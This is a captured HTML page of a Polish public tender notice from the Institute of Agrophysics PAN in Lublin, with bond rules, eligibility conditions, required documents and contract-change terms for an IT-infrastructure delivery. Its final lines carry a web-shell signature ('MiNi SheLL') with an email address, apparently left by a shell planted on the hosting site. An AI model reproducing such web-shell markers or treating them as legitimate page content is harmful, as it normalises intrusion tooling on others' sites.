z gwarancji- poręczenia oraz jeżeli stwarza to zagrożenie wygaśnięcia-odwołania ustanowionego w ten sposób zabezpieczenia interesu Zamawiającego.
W innym przypadku wystarczająca jest kopia dokumentu poświadczona (potwierdzona) za zgodność
z oryginałem przez osobę-osoby uprawnioną-uprawnione do reprezentowania wykonawcy.
6. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi 
na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, 
o których mowa w art. 25 ust.1 ustawy, lub pełnomocnictw, chyba że udowodni, 
że wynika to z przyczyn nieleżących po jego stronie.
7. Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na rzecz zamawiającego w przypadku, gdy:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie,
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
8.  W przypadku, gdy wykonawca wnosi wadium w formie gwarancji bankowej lub gwarancji ubezpieczeniowej z treści tych gwarancji musi w szczególności jednoznacznie wynikać:
1) zobowiązanie gwaranta (banku, zakładu ubezpieczeń) do zapłaty całej kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie zamawiającego (beneficjenta gwarancji) zawierające oświadczenie, że zaistniały okoliczności, o których mowa w pkt 7 ppkt 1), 2), 3) bez potwierdzania tych okoliczności, 
2) termin obowiązywania gwarancji, który nie może być krótszy niż termin związania ofertą,
3) miejsce i termin zwrotu gwarancji.
9.  Wadium może być wniesione w jednej lub kilku formach.
10. Wykonawca, który nie wniósł wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy, albo nie zgodził się 
na przedłużenie okresu związania ofertą zostanie wykluczony z postępowania,  a oferta jego uznana 
za odrzuconą.
11. W ofercie należy wpisać nr konta, na który zamawiający będzie mógł zwrócić wadium w pieniądzu lub do oferty załączyć upoważnienie dla osoby, której zamawiający będzie mógł zwrócić wadium wniesione w innej formie niż pieniężna.
12.  Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
13. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 6.
14. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy. W przypadku wniesienia wadium w pieniądzu wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia.
15. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
16. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt 13, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
17. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi 
z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
18. Zamawiający dokona zwrotu lub zatrzymania wadium zgodnie z art. 46 Ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Numeracja zgodnie z SIWZ: 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu z postępowania o udzielenie zamówienia oraz spełniają warunki, dotyczące: 
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2) posiadania wiedzy i doświadczenia, tj.:
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali i prawidłowo ukończyli:
co najmniej 1 dostawę infrastruktury informatycznej o wartości minimum 
100 000,00 złotych brutto
2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich 
nie może podlegać wykluczeniu z postępowania, a warunki określone w pkt. 1 ppkt 1) muszą spełnić wszyscy Wykonawcy.  
3. Wykonawca jest zobowiązany wykazać, nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w pkt 1 i brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Numeracja zgodnie z SIWZ: 4. W celu potwierdzenia spełnienia warunków udziału w postępowaniu z pkt 1, Zamawiający żąda złożenia przez Wykonawców następujących dokumentów: 
1) wykazu wykonanych dostaw (przynajmniej jednej) dotyczących dostawy infrastruktury informatycznej, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości, przedmiotu, 
dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że zostały wykonane 
i prawidłowo ukończone; w przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jeden wspólny ww. wykaz;  wg. załącznika nr 4 do SIWZ,
2) oświadczenia o spełnieniu warunków udziału w postępowaniu, według wzoru stanowiącego załącznik nr 2 do niniejszej SIWZ; 

Informacja o oświadczeniach lub dokumentach potwierdzających spełnienie przez oferowane dostawy wymagań określonych przez zamawiającego:
W celu potwierdzenia, że oferowany przedmiot zamówienia spełnia wymagania określone przez Zamawiającego w Rozdziale I, wykonawca zobowiązany jest załączyć do oferty opis oferowanego przedmiotu zamówienia zgodnie z załącznikiem nr 5 do SIWZ.

5. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia 
w okolicznościach wskazanych w art. 24 ust. 1 ustawy, Zamawiający żąda następujących dokumentów:

1) oświadczenie o braku podstaw do wykluczenia, na formularzu stanowiącym załącznik nr 3 
do SIWZ. 
2) aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 Ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 Ustawy.
W przypadku złożenia oferty wspólnej ww. oświadczenie oraz odpis z rejestru składa każdy 
z podmiotów występujących wspólnie.
6. Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożą oświadczeń 
i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu, o których mowa 
w pkt 4 i 5 lub którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w określonym terminie, chyba że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.
7. Ocena spełnienia warunków określonych dla wykonawców będzie dokonywana przy zastosowaniu kryterium spełnia, nie spełnia. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie przedłożonych przez Wykonawców dokumentów, zaświadczeń i oświadczeń, o których mowa w niniejszym rozdziale. 
8. Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
a) ofertę cenową zgodnie z rozdziałem VII;
W przypadku składania oferty wspólnej należy złożyć jeden dokument.
b) pełnomocnictwo, o którym mowa w rozdziale VIII;
Tylko w przypadku składania oferty wspólnej.

Wykonawcy zagraniczni 
Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej  zamiast dokumentu, o którym mowa w:
a)	Rozdz. III SIWZ - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed terminem składania ofert.
b)	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o których mowa w pkt a) zastępuje je się dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego wymagania w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Numeracja zgodnie z SIWZ:
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu z postępowania o udzielenie zamówienia oraz spełniają warunki, dotyczące: 
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2) posiadania wiedzy i doświadczenia, tj.:
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali i prawidłowo ukończyli:
co najmniej 1 dostawę infrastruktury informatycznej o wartości minimum 
100 000,00 złotych brutto
2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich 
nie może podlegać wykluczeniu z postępowania, a warunki określone w pkt. 1 ppkt 1) muszą spełnić wszyscy Wykonawcy.  
3. Wykonawca jest zobowiązany wykazać, nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w pkt 1 i brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy.
4. W celu potwierdzenia spełnienia warunków udziału w postępowaniu z pkt 1, Zamawiający żąda złożenia przez Wykonawców następujących dokumentów: 
1) wykazu wykonanych dostaw (przynajmniej jednej) dotyczących dostawy infrastruktury informatycznej, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości, przedmiotu, 
dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że zostały wykonane 
i prawidłowo ukończone; w przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jeden wspólny ww. wykaz;  wg. załącznika nr 4 do SIWZ,
2) oświadczenia o spełnieniu warunków udziału w postępowaniu, według wzoru stanowiącego załącznik nr 2 do niniejszej SIWZ; 

Informacja o oświadczeniach lub dokumentach potwierdzających spełnienie przez oferowane dostawy wymagań określonych przez zamawiającego:
W celu potwierdzenia, że oferowany przedmiot zamówienia spełnia wymagania określone przez Zamawiającego w Rozdziale I, wykonawca zobowiązany jest załączyć do oferty opis oferowanego przedmiotu zamówienia zgodnie z załącznikiem nr 5 do SIWZ.

5. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia 
w okolicznościach wskazanych w art. 24 ust. 1 ustawy, Zamawiający żąda następujących dokumentów:

1) oświadczenie o braku podstaw do wykluczenia, na formularzu stanowiącym załącznik nr 3 
do SIWZ. 
2) aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 Ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 Ustawy.
W przypadku złożenia oferty wspólnej ww. oświadczenie oraz odpis z rejestru składa każdy 
z podmiotów występujących wspólnie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego wymagania w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Numeracja zgodnie z SIWZ:
W celu potwierdzenia spełnienia warunków udziału w postępowaniu z pkt 1, Zamawiający żąda złożenia przez Wykonawców następujących dokumentów:
1) wykazu wykonanych dostaw (przynajmniej jednej) dotyczących dostawy infrastruktury informatycznej, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości, przedmiotu, 
dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że zostały wykonane 
i prawidłowo ukończone; w przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jeden wspólny ww. wykaz;  wg. załącznika nr 4 do SIWZ</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Numeracja zgodnie z SIWZ: Zamawiający przewiduje zmiany umowy w przypadku:
	1) aktualizacji rozwiązań ze względu na postęp technologiczny (np. wycofanie z obrotu urządzeń lub materiałów); zmiana nie może spowodować zmiany ceny wynikającej z oferty, 
na podstawie której był dokonany wybór wykonawcy;
	2) konieczność zmiany terminu realizacji przedmiotu zamówienia z przyczyn niezawinionych przez strony (np. wydłużony czas oczekiwania na elementy wytwarzane przez producenta, czas konieczny do uzyskania niezbędnych dokumentów z organów administracji rządowej i samorządowej, lub innych); zmiana nie może spowodować zmiany ceny wynikającej z oferty, na podstawie której był dokonany wybór wykonawcy;
	3) zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie treści umowy 
do aktualnego stanu prawnego,
	4) zmiany stawki podatku VAT. Cena brutto ulegnie zmniejszeniu w przypadku obniżenia stawki podatku od towarów i usług lub podwyższeniu w przypadku podwyższenia stawki podatku od towarów i usług.
Inicjatorem zmian może być Zamawiający lub wykonawca poprzez pisemne wystąpienie w okresie obowiązywania umowy zawierające opis proponowanych zmian, ich uzasadnienie oraz termin wprowadzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:/www.ipan.lublin.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Agrofizyki Polskiej Akademii Nauk, ul. Doświadczalna 4, 20-290 Lublin, pok.4 w Budynku Głównym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2012 godzina 12:00, miejsce: Instytut Agrofizyki Polskiej Akademii Nauk, ul. Doświadczalna 4, 20-290 Lublin, pok.18 (sekretariat) w Budynku Głównym.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przetarg realizowany w ramach dotacji przyznanej przez Ministerstwo Nauki i Szkolnictwa Wyższego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com